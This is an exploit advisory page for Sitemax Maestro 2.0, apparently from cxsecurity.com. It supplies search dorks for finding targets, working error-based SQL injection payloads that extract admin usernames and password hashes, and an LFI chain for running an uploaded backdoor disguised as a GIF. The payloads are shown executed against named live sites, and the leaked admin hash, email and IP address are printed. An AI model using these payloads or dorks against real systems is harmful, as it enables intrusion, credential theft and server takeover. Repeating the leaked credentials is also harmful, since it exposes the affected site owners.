Sitemax Maestro 2.0 SQL Injection and LFI

2012.09.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-98

?======================================== Vulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/) Sitemax Maestro v. 2.0 Vendor: http://sitemax.am/ License Type: Commercial Discovered and Exploited in Wild ========================================= Dork 1: site:am pages.php?al= Dork 2: site:am swlang.php Dork: 3 Designed and developed by SiteMax IT Sitemax Maestro v. 2.0 ========================================= Error based Blind SQLi: http://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1 http://megasport.am/maestro/ <== Admin Panel Megasport 2012-09-03 05:51 Fatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1 SELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1 If the MYSQL v >5.1 you can use this way also:(Funny pow() failure ;)) http://site.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1 Demo 2 and New technique: http://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1 2012-09-02 19:59 Fatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','getosdur@localhost.tld','130.193.121.51') from dual limit 1))),(rand() * 1e100))' SELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND visible='1' LIMIT 1 Local File Inclusion: After gain access to admin panel: Upload your backdoor as backdoor.gif file using site.am/pfs.php Then include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA== Enjoy with your backdoor on server) SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS: =========================================================== packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com exploit-db.com to all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.* =========================================================== /AkaStep & BOT_25 & HERO_AZE


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top